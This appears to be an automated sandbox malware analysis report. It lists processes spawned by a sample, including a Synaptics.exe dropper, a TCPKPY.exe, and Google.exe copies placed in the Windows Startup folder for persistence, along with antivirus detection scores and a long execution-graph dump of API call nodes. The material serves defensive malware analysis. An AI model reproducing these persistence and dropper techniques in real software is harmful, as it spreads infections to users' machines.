                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:26
                                                                                                                                                                            Start time:05:49:09
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:771'584 bytes
                                                                                                                                                                            MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:05:49:10
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:53'161'064 bytes
                                                                                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:05:49:17
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:05:49:26
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:2'208'256 bytes
                                                                                                                                                                            MD5 hash:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:32
                                                                                                                                                                            Start time:05:49:26
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                                                                                                                                                                            Imagebase:0xac0000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:33
                                                                                                                                                                            Start time:05:49:34
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:34
                                                                                                                                                                            Start time:05:49:47
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                                                                                                                                                                            Imagebase:0xac0000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:36
                                                                                                                                                                            Start time:05:49:49
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 9672
                                                                                                                                                                            Imagebase:0x3a0000
                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:37
                                                                                                                                                                            Start time:05:50:00
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:7.5%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:36
                                                                                                                                                                              execution_graph 102945 4be849 102948 4c26c0 102945->102948 102947 4be852 102949 4c273b 102948->102949 102950 52862d 102948->102950 102955 4c2adc 102949->102955 102956 4c277c 102949->102956 102965 4c279a 102949->102965 103151 4fd520 86 API calls 4 library calls 102950->103151 102952 52863e 103152 4fd520 86 API calls 4 library calls 102952->103152 102953 4c27cf 102953->102952 102958 4c27db 102953->102958 102954 4c2a84 103140 4bd380 102954->103140 103150 4bd349 53 API calls 102955->103150 102990 4c28f6 102956->102990 103070 4bd500 53 API calls __cinit 102956->103070 102960 4c27ef 102958->102960 102974 52865a 102958->102974 102962 4c2806 102960->102962 102963 5286c9 102960->102963 103071 4bfa40 102962->103071 102968 528ac9 102963->102968 102971 4bfa40 420 API calls 102963->102971 102965->102953 102965->102954 102979 4c2914 102965->102979 103231 4fd520 86 API calls 4 library calls 102968->103231 102972 5286ee 102971->102972 102985 52870a 102972->102985 102987 4c29ec 102972->102987 103155 4bd89e 102972->103155 102974->102963 102974->102987 103153 50f211 420 API calls 102974->103153 103154 50f4df 420 API calls 102974->103154 102975 528980 103226 4fd520 86 API calls 4 library calls 102975->103226 103051 4bcdb4 102979->103051 102980 4c2836 102980->102968 102982 4bfa40 420 API calls 102980->102982 103004 4c287c 102982->103004 102984 4c28cc 102984->102990 103128 4bcf97 58 API calls 102984->103128 102993 52878d 102985->102993 103165 4b346e 48 API calls 102985->103165 102987->102947 102988 4c296e 102988->102987 102994 4c2984 102988->102994 102999 528a97 102988->102999 103007 5289b4 102988->103007 102989 4c28ac 102989->102984 103224 4bcf97 58 API calls 102989->103224 102998 4c2900 102990->102998 103225 4bcf97 58 API calls 102990->103225 102992 52883f 103218 50c235 420 API calls Mailbox 102992->103218 102993->102992 102997 52882d 102993->102997 103182 4f4e71 53 API calls __cinit 102993->103182 102994->102999 103129 4c41fc 84 API calls 102994->103129 103204 4bca8e 102997->103204 102998->102975 102998->102979 102999->102987 103230 4b4b02 50 API calls 102999->103230 103001 528888 103008 4c281d 103001->103008 103009 52888c 103001->103009 103004->102987 103004->102989 103012 4bfa40 420 API calls 103004->103012 103056 50bf80 103007->103056 103008->102980 103008->102987 103220 4bc935 103008->103220 103219 4fd520 86 API calls 4 library calls 103009->103219 103011 4c29b8 103013 528a7e 103011->103013 103130 4c41fc 84 API calls 103011->103130 103019 5288ff 103012->103019 103229 4cee93 84 API calls 103013->103229 103014 528725 103014->102997 103166 4c14a0 103014->103166 103016 528813 103024 4bd89e 50 API calls 103016->103024 103017 5287ca 103017->103016 103183 4b84a6 103017->103183 103019->102987 103025 4bd89e 50 API calls 103019->103025 103021 5289f3 103032 528a42 103021->103032 103033 528a01 103021->103033 103023 4c29ca 103023->102987 103028 4c29e5 103023->103028 103029 528a6f 103023->103029 103026 528821 103024->103026 103025->102989 103030 4bd89e 50 API calls 103026->103030 103131 4d010a 103028->103131 103228 50d1da 50 API calls 103029->103228 103030->102997 103031 52875d 103031->102997 103040 4c14a0 48 API calls 103031->103040 103034 4bd89e 50 API calls 103032->103034 103037 4bca8e 48 API calls 103033->103037 103038 528a4b 103034->103038 103037->102987 103041 4bd89e 50 API calls 103038->103041 103039 5287e0 103039->103016 103203 4fa76d 49 API calls 103039->103203 103043 528775 103040->103043 103044 528a57 103041->103044 103046 4bd89e 50 API calls 103043->103046 103227 4b4b02 50 API calls 103044->103227 103045 528807 103048 4bd89e 50 API calls 103045->103048 103049 528781 103046->103049 103048->103016 103050 4bd89e 50 API calls 103049->103050 103050->102993 103052 4bcdc5 103051->103052 103053 4bcdca 103051->103053 103052->103053 103232 4d2241 48 API calls 103052->103232 103053->102988 103055 4bce07 103055->102988 103057 50bfd9 _memset 103056->103057 103060 50c14c 103057->103060 103063 50c097 VariantInit 103057->103063 103067 50c033 103057->103067 103059 50c22e 103059->103021 103061 50c19f VariantInit VariantClear 103060->103061 103060->103067 103062 50c1c5 103061->103062 103064 50c1e6 103062->103064 103062->103067 103068 50c0d6 103063->103068 103234 4fa6f6 103 API calls 103064->103234 103066 50c20d VariantClear 103066->103059 103235 50c235 420 API calls Mailbox 103067->103235 103068->103067 103233 4fa6f6 103 API calls 103068->103233 103070->102965 103072 4bfa60 103071->103072 103108 4bfa8e Mailbox _memmove 103071->103108 103073 4d010a 48 API calls 103072->103073 103073->103108 103074 4c105e 103075 4bc935 48 API calls 103074->103075 103101 4bfbf1 Mailbox 103075->103101 103076 4ea599 InterlockedDecrement 103076->103108 103077 4bd3d2 48 API calls 103077->103108 103078 4c0119 103701 4fd520 86 API calls 4 library calls 103078->103701 103080 4d010a 48 API calls 103080->103108 103082 4c1063 103700 4fd520 86 API calls 4 library calls 103082->103700 103083 4bc935 48 API calls 103083->103108 103085 4c0dee 103086 4bd89e 50 API calls 103085->103086 103088 4c0dfa 103086->103088 103087 52b772 103702 4fd520 86 API calls 4 library calls 103087->103702 103090 4bd89e 50 API calls 103088->103090 103092 4c0e83 103090->103092 103689 4bcaee 103092->103689 103094 52b7d2 103095 4d1b2a 52 API calls __cinit 103095->103108 103099 4c1230 103099->103101 103699 4fd520 86 API calls 4 library calls 103099->103699 103101->103008 103102 4bfa40 420 API calls 103102->103108 103105 52b583 103697 4fd520 86 API calls 4 library calls 103105->103697 103107 4c10f1 Mailbox 103698 4fd520 86 API calls 4 library calls 103107->103698 103108->103074 103108->103076 103108->103077 103108->103078 103108->103080 103108->103082 103108->103083 103108->103085 103108->103087 103108->103088 103108->103092 103108->103095 103108->103099 103108->103101 103108->103102 103108->103105 103108->103107 103236 4bf6d0 103108->103236 103308 51798d 103108->103308 103313 4b50a3 103108->103313 103318 5117aa 103108->103318 103323 50b74b VariantInit 103108->103323 103364 4b81c6 103108->103364 103434 4cf461 103108->103434 103472 5130ad 103108->103472 103526 4cdd84 103108->103526 103529 508065 GetCursorPos GetForegroundWindow 103108->103529 103543 5092c0 103108->103543 103561 51804e 103108->103561 103575 50936f 103108->103575 103603 50013f 103108->103603 103616 4cef0d 103108->103616 103659 4cf03e 103108->103659 103662 509122 103108->103662 103676 510bfa 103108->103676 103679 511f19 103108->103679 103682 5110e5 103108->103682 103688 4c1620 59 API calls Mailbox 103108->103688 103693 50ee52 82 API calls 2 library calls 103108->103693 103694 50ef9d 90 API calls Mailbox 103108->103694 103695 4fb020 48 API calls 103108->103695 103696 50e713 420 API calls Mailbox 103108->103696 103128->102990 103129->103011 103130->103023 103134 4d0112 __calloc_impl 103131->103134 103133 4d012c 103133->102987 103134->103133 103135 4d012e std::exception::exception 103134->103135 105179 4d45ec 103134->105179 105193 4d7495 RaiseException 103135->105193 103137 4d0158 105194 4d73cb 47 API calls _free 103137->105194 103139 4d016a 103139->102987 103141 4bd38b 103140->103141 103142 4bd3b4 103141->103142 105201 4bd772 55 API calls 103141->105201 103144 4bd2d2 103142->103144 103145 4bd2df 103144->103145 103148 4bd30a 103144->103148 103146 4bd2e6 103145->103146 105203 4bd349 53 API calls 103145->105203 103146->103148 105202 4bd349 53 API calls 103146->105202 103148->102979 103150->102989 103151->102952 103152->102974 103153->102974 103154->102974 103156 4bd8ac 103155->103156 103163 4bd8db Mailbox 103155->103163 103157 4bd8ff 103156->103157 103159 4bd8b2 Mailbox 103156->103159 103158 4bc935 48 API calls 103157->103158 103158->103163 103160 4bd8c7 103159->103160 103161 524e9b 103159->103161 103162 524e72 VariantClear 103160->103162 103160->103163 103161->103163 105204 4ea599 InterlockedDecrement 103161->105204 103162->103163 103163->102985 103165->103014 103167 4c1606 103166->103167 103169 4c14b2 103166->103169 103167->103031 103168 4c156d 103168->103031 103172 4d010a 48 API calls 103169->103172 103181 4c14be 103169->103181 103171 4c14c9 103171->103168 103175 4d010a 48 API calls 103171->103175 103173 525299 103172->103173 103174 4d010a 48 API calls 103173->103174 103180 5252a4 103174->103180 103176 4c15af 103175->103176 103177 4c15c2 103176->103177 105205 4cd6b4 48 API calls 103176->105205 103177->103031 103179 4d010a 48 API calls 103179->103180 103180->103179 103180->103181 103181->103171 105206 4b346e 48 API calls 103181->105206 103182->103017 103184 4b84be 103183->103184 103201 4b84ba 103183->103201 103185 525592 __i64tow 103184->103185 103186 525494 103184->103186 103187 4b84d2 103184->103187 103194 4b84ea __itow Mailbox _wcscpy 103184->103194 103188 52557a 103186->103188 103189 52549d 103186->103189 105207 4d234b 80 API calls 3 library calls 103187->105207 105208 4d234b 80 API calls 3 library calls 103188->105208 103189->103194 103195 5254bc 103189->103195 103191 4d010a 48 API calls 103193 4b84f4 103191->103193 103197 4bcaee 48 API calls 103193->103197 103193->103201 103194->103191 103196 4d010a 48 API calls 103195->103196 103198 5254d9 103196->103198 103197->103201 103199 4d010a 48 API calls 103198->103199 103200 5254ff 103199->103200 103200->103201 103202 4bcaee 48 API calls 103200->103202 103201->103039 103202->103201 103203->103045 103205 4bca9a 103204->103205 103206 4bcad0 103204->103206 103211 4d010a 48 API calls 103205->103211 103207 4bcad9 103206->103207 103208 4bcae3 103206->103208 103209 4b7e53 48 API calls 103207->103209 103210 4bc4cd 48 API calls 103208->103210 103215 4bcac6 103209->103215 103210->103215 103212 4bcaad 103211->103212 103213 524f11 103212->103213 103214 4bcab8 103212->103214 103213->103215 103216 4bd3d2 48 API calls 103213->103216 103214->103215 103217 4bcaee 48 API calls 103214->103217 103215->102992 103216->103215 103217->103215 103218->103001 103219->102987 103221 4bc948 103220->103221 103222 4bc940 103220->103222 103221->102980 103223 4bd805 48 API calls 103222->103223 103223->103221 103224->102984 103225->102998 103226->102987 103227->102987 103228->103013 103229->102999 103230->102968 103231->102987 103232->103055 103233->103060 103234->103066 103235->103059 103237 4bf708 103236->103237 103241 4bf77b 103236->103241 103238 52c4d5 103237->103238 103239 4bf712 103237->103239 103244 52c4e2 103238->103244 103245 52c4f4 103238->103245 103240 4bf71c 103239->103240 103259 52c544 103239->103259 103251 52c6a4 103240->103251 103255 4bf72a 103240->103255 103266 4bf741 103240->103266 103243 52c253 103241->103243 103262 4bf787 103241->103262 103242 4bfa40 420 API calls 103242->103262 103726 4fd520 86 API calls 4 library calls 103243->103726 103703 50f34f 103244->103703 103731 50c235 420 API calls Mailbox 103245->103731 103246 4bf770 Mailbox 103246->103108 103247 52c585 103260 52c590 103247->103260 103261 52c5a4 103247->103261 103254 4bc935 48 API calls 103251->103254 103252 52c264 103252->103108 103253 52c507 103257 52c50b 103253->103257 103253->103266 103254->103266 103255->103266 103832 4ea599 InterlockedDecrement 103255->103832 103732 4fd520 86 API calls 4 library calls 103257->103732 103258 4bf9d8 103729 4fd520 86 API calls 4 library calls 103258->103729 103259->103247 103273 52c569 103259->103273 103265 50f34f 420 API calls 103260->103265 103734 50d154 48 API calls 103261->103734 103262->103242 103262->103246 103262->103258 103263 4bf8bb 103262->103263 103268 4d2241 48 API calls 103262->103268 103272 4bf84a 103262->103272 103263->103252 103263->103266 103269 52c45a 103263->103269 103728 4ea599 InterlockedDecrement 103263->103728 103730 50f4df 420 API calls 103263->103730 103265->103266 103266->103246 103277 52c7b5 103266->103277 103833 50ee52 82 API calls 2 library calls 103266->103833 103268->103262 103271 4bc935 48 API calls 103269->103271 103271->103266 103279 52c32a 103272->103279 103290 4bf854 103272->103290 103733 4fd520 86 API calls 4 library calls 103273->103733 103276 52c7eb 103278 4bd89e 50 API calls 103276->103278 103277->103276 103834 50ef9d 90 API calls Mailbox 103277->103834 103278->103246 103727 4b342c 48 API calls 103279->103727 103281 52c793 103285 4b84a6 81 API calls 103281->103285 103282 52c5af 103286 52c62c 103282->103286 103295 52c5d1 103282->103295 103297 52c79b __NMSG_WRITE 103285->103297 103759 4fafce 48 API calls 103286->103759 103287 52c7c9 103289 4b84a6 81 API calls 103287->103289 103288 4c14a0 48 API calls 103292 4bf8ab 103288->103292 103293 52c7d1 __NMSG_WRITE 103289->103293 103290->103288 103292->103258 103292->103263 103293->103276 103301 4bd89e 50 API calls 103293->103301 103735 4fa485 48 API calls 103295->103735 103296 52c63e 103760 4cdf08 48 API calls 103296->103760 103297->103277 103299 4bd89e 50 API calls 103297->103299 103299->103277 103301->103276 103302 52c647 Mailbox 103761 4fa485 48 API calls 103302->103761 103303 52c5f6 103736 4c44e0 103303->103736 103306 52c663 103762 4c3680 103306->103762 104689 4b19ee 103308->104689 103312 5179a4 103312->103108 103314 4d010a 48 API calls 103313->103314 103315 4b50b3 103314->103315 103316 4b50ec CloseHandle 103315->103316 103317 4b50be 103316->103317 103317->103108 103319 4b84a6 81 API calls 103318->103319 103320 5117c7 103319->103320 103321 4f6f5b 63 API calls 103320->103321 103322 5117d8 103321->103322 103322->103108 103324 4bca8e 48 API calls 103323->103324 103325 50b7a3 CoInitialize 103324->103325 103326 50b7ae CoUninitialize 103325->103326 103328 50b7b4 103325->103328 103326->103328 103327 50b7d5 103330 50b81b 103327->103330 103331 4b84a6 81 API calls 103327->103331 103328->103327 103329 4bca8e 48 API calls 103328->103329 103329->103327 103332 4b84a6 81 API calls 103330->103332 103333 50b7ef 103331->103333 103334 50b827 103332->103334 104813 4ea857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 103333->104813 103337 50b9d3 SetErrorMode CoGetInstanceFromFile 103334->103337 103348 50b861 103334->103348 103336 50b802 103336->103330 103338 50b807 103336->103338 103340 50ba19 SetErrorMode 103337->103340 103341 50ba1f CoGetObject 103337->103341 104814 50c235 420 API calls Mailbox 103338->104814 103339 50b8a8 GetRunningObjectTable 103345 50b8cb 103339->103345 103346 50b8b8 103339->103346 103361 50b9b1 103340->103361 103341->103340 103344 50baa8 103341->103344 104819 50c235 420 API calls Mailbox 103344->104819 104815 50c235 420 API calls Mailbox 103345->104815 103346->103345 103362 50b8ed 103346->103362 103348->103339 103352 50b89a 103348->103352 103355 4bcdb4 48 API calls 103348->103355 103350 50bad0 VariantClear 103350->103108 103351 50b814 Mailbox 103351->103350 103352->103339 103353 50bac2 SetErrorMode 103353->103351 103354 50ba53 103356 50ba6f 103354->103356 104817 4eac4b 51 API calls Mailbox 103354->104817 103358 50b88a 103355->103358 104818 4fa6f6 103 API calls 103356->104818 103358->103352 103360 4bcdb4 48 API calls 103358->103360 103360->103352 103361->103344 103361->103354 103362->103361 104816 4eac4b 51 API calls Mailbox 103362->104816 103365 4b84a6 81 API calls 103364->103365 103366 4b81e5 103365->103366 103367 4b84a6 81 API calls 103366->103367 103368 4b81fa 103367->103368 103369 4b84a6 81 API calls 103368->103369 103370 4b820d 103369->103370 103371 4b84a6 81 API calls 103370->103371 103372 4b8223 103371->103372 103373 4b7b6e 48 API calls 103372->103373 103374 4b8237 103373->103374 103375 4b846a 103374->103375 103376 4bcdb4 48 API calls 103374->103376 103379 52d91e 103375->103379 103380 52d95f 103375->103380 103377 4b825e 103376->103377 103377->103375 103378 52d752 103377->103378 103407 4b8281 __wopenfile 103377->103407 103381 4b3320 48 API calls 103378->103381 103383 4b3320 48 API calls 103379->103383 103382 4b3320 48 API calls 103380->103382 103385 52d769 103381->103385 103386 52d96a 103382->103386 103384 52d928 103383->103384 103387 4b84a6 81 API calls 103384->103387 103411 52d790 103385->103411 104848 4c2320 50 API calls 103385->104848 104853 4c2320 50 API calls 103386->104853 103389 52d93a 103387->103389 103393 4b80ea 48 API calls 103389->103393 103391 4b84a6 81 API calls 103394 4b8306 103391->103394 103392 52d985 103402 4b84a6 81 API calls 103392->103402 103396 52d94e 103393->103396 103397 4b84a6 81 API calls 103394->103397 103395 4b80ea 48 API calls 103395->103411 103400 4b8182 48 API calls 103396->103400 103401 4b831b 103397->103401 103398 52d7ed 103398->103375 103410 4b3320 48 API calls 103398->103410 103399 4b8182 48 API calls 103399->103411 103403 52d95c 103400->103403 103401->103375 103401->103398 103408 4b8342 103401->103408 103404 52d9a0 103402->103404 104854 4c2320 50 API calls 103403->104854 103405 4b80ea 48 API calls 103404->103405 103409 52d9b4 103405->103409 103407->103375 103407->103391 103407->103398 103430 4b8364 103407->103430 104832 4b3320 103408->104832 103415 4b8182 48 API calls 103409->103415 103416 52d84a 103410->103416 103411->103395 103411->103399 103417 4b843f Mailbox 103411->103417 104849 4c2320 50 API calls 103411->104849 103414 4b834c 103418 4bc4cd 48 API calls 103414->103418 103415->103403 104850 4c2320 50 API calls 103416->104850 103417->103108 103418->103430 103423 52d895 103424 52d8ce 103423->103424 103426 52d8bf 103423->103426 103425 4b8182 48 API calls 103424->103425 103428 52d8dc 103425->103428 104851 4bbd2f 48 API calls _memmove 103426->104851 104852 4c2320 50 API calls 103428->104852 103430->103417 103430->103423 104820 4b80ea 103430->104820 104843 4d247b 59 API calls 2 library calls 103430->104843 104844 4b8182 103430->104844 104847 4c2320 50 API calls 103430->104847 103431 52d8ee 103433 4bc4cd 48 API calls 103431->103433 103433->103375 103435 4cf48a 103434->103435 103436 4cf47f 103434->103436 103440 4b84a6 81 API calls 103435->103440 103461 4cf498 Mailbox 103435->103461 103437 4bcdb4 48 API calls 103436->103437 103437->103435 103438 4d010a 48 API calls 103439 4cf49f 103438->103439 103442 4cf4af 103439->103442 104858 4b5080 49 API calls 103439->104858 103441 526841 103440->103441 103443 4d297d __wsplitpath 47 API calls 103441->103443 103446 4b84a6 81 API calls 103442->103446 103445 526859 103443->103445 103447 4bcaee 48 API calls 103445->103447 103448 4cf4bf 103446->103448 103449 52686a 103447->103449 103450 4b4bf9 56 API calls 103448->103450 104859 4b39e8 48 API calls 2 library calls 103449->104859 103451 4cf4ce 103450->103451 103453 5268d4 GetLastError 103451->103453 103465 4cf4d6 103451->103465 103456 5268ed 103453->103456 103454 526878 103455 526895 103454->103455 104860 4f6f4b GetFileAttributesW FindFirstFileW FindClose 103454->104860 103457 4bcdb4 48 API calls 103455->103457 103456->103465 104861 4b4592 CloseHandle 103456->104861 103457->103461 103458 526920 103463 4d010a 48 API calls 103458->103463 103459 4cf4f0 103462 4d010a 48 API calls 103459->103462 103461->103438 103471 4cf50a Mailbox 103461->103471 103466 4cf4f5 103462->103466 103467 526925 103463->103467 103464 526888 103464->103455 103470 4f6d6d 52 API calls 103464->103470 103465->103458 103465->103459 103469 4b197e 48 API calls 103466->103469 103469->103471 103470->103455 103471->103108 103473 4bca8e 48 API calls 103472->103473 103474 5130ca 103473->103474 103475 4bd3d2 48 API calls 103474->103475 103476 5130d3 103475->103476 103477 4bd3d2 48 API calls 103476->103477 103478 5130dc 103477->103478 103479 4bd3d2 48 API calls 103478->103479 103480 5130e5 103479->103480 103481 4b84a6 81 API calls 103480->103481 103482 5130f4 103481->103482 103483 513d7b 48 API calls 103482->103483 103484 513128 103483->103484 103485 513af7 49 API calls 103484->103485 103486 513159 103485->103486 103487 51319c RegOpenKeyExW 103486->103487 103488 513172 RegConnectRegistryW 103486->103488 103497 51315d Mailbox 103486->103497 103490 5131c5 103487->103490 103491 5131f7 103487->103491 103488->103487 103488->103497 103494 5131d9 RegCloseKey 103490->103494 103490->103497 103492 4b84a6 81 API calls 103491->103492 103493 513207 RegQueryValueExW 103492->103493 103495 513229 103493->103495 103496 51323e 103493->103496 103494->103497 103501 5134eb RegCloseKey 103495->103501 103496->103495 103498 513265 103496->103498 103499 51344c 103496->103499 103497->103108 103502 5133d9 103498->103502 103503 51326e 103498->103503 103500 4d010a 48 API calls 103499->103500 103504 513464 103500->103504 103501->103497 103505 5134fe RegCloseKey 103501->103505 104862 4fad14 48 API calls _memset 103502->104862 103507 513279 103503->103507 103508 51338d 103503->103508 103510 4b84a6 81 API calls 103504->103510 103505->103497 103512 5132de 103507->103512 103513 51327e 103507->103513 103509 4b84a6 81 API calls 103508->103509 103514 5133a1 RegQueryValueExW 103509->103514 103516 513479 RegQueryValueExW 103510->103516 103511 5133e4 103517 4b84a6 81 API calls 103511->103517 103515 4d010a 48 API calls 103512->103515 103513->103495 103520 4b84a6 81 API calls 103513->103520 103514->103495 103518 5132f7 103515->103518 103516->103495 103525 513331 103516->103525 103519 5133f6 RegQueryValueExW 103517->103519 103521 4b84a6 81 API calls 103518->103521 103519->103495 103519->103501 103522 51329f RegQueryValueExW 103520->103522 103523 51330c RegQueryValueExW 103521->103523 103522->103495 103523->103495 103523->103525 103524 4bca8e 48 API calls 103524->103495 103525->103524 104863 4cdd92 GetFileAttributesW 103526->104863 104868 506b19 103529->104868 103532 5080a5 103533 4b3320 48 API calls 103532->103533 103534 5080b3 103533->103534 104873 4c2320 50 API calls 103534->104873 103535 508102 103537 4bcdb4 48 API calls 103535->103537 103542 5080f5 103535->103542 103539 50812b 103537->103539 103538 5080cf 104874 4c2320 50 API calls 103538->104874 103541 4bcdb4 48 API calls 103539->103541 103539->103542 103541->103542 103542->103108 103544 4ba6d4 48 API calls 103543->103544 103545 5092d2 103544->103545 103546 4b84a6 81 API calls 103545->103546 103547 5092e1 103546->103547 103548 4cf26b 50 API calls 103547->103548 103549 5092ed gethostbyname 103548->103549 103550 5092fa WSAGetLastError 103549->103550 103552 50931d _memmove 103549->103552 103551 50930e 103550->103551 103554 4bca8e 48 API calls 103551->103554 103553 50932d inet_ntoa 103552->103553 104875 50adca 48 API calls 2 library calls 103553->104875 103560 50931b Mailbox 103554->103560 103556 509342 104876 50ae5a 50 API calls 103556->104876 103558 50934e 104877 4b7bef 103558->104877 103560->103108 103562 4b19ee 83 API calls 103561->103562 103563 518062 103562->103563 103564 4b1dce 107 API calls 103563->103564 103565 51806b 103564->103565 103566 518091 103565->103566 103567 51806f 103565->103567 103568 4bd3d2 48 API calls 103566->103568 103569 4bca8e 48 API calls 103567->103569 103570 51809a 103568->103570 103574 51808f Mailbox 103569->103574 104883 4ee2e8 103570->104883 103572 5180aa 103573 4b7bef 48 API calls 103572->103573 103573->103574 103574->103108 103576 4bcdb4 48 API calls 103575->103576 103577 50938a 103576->103577 103578 4bcdb4 48 API calls 103577->103578 103579 50939a 103578->103579 103580 4bca8e 48 API calls 103579->103580 103581 5093a9 103580->103581 103582 5093c2 select 103581->103582 103599 5093ae Mailbox _memmove 103581->103599 103583 509414 WSAGetLastError 103582->103583 103584 50941f 103582->103584 103583->103599 103585 4d010a 48 API calls 103584->103585 103586 509428 103585->103586 103587 4b4bce 48 API calls 103586->103587 103588 509432 __WSAFDIsSet 103587->103588 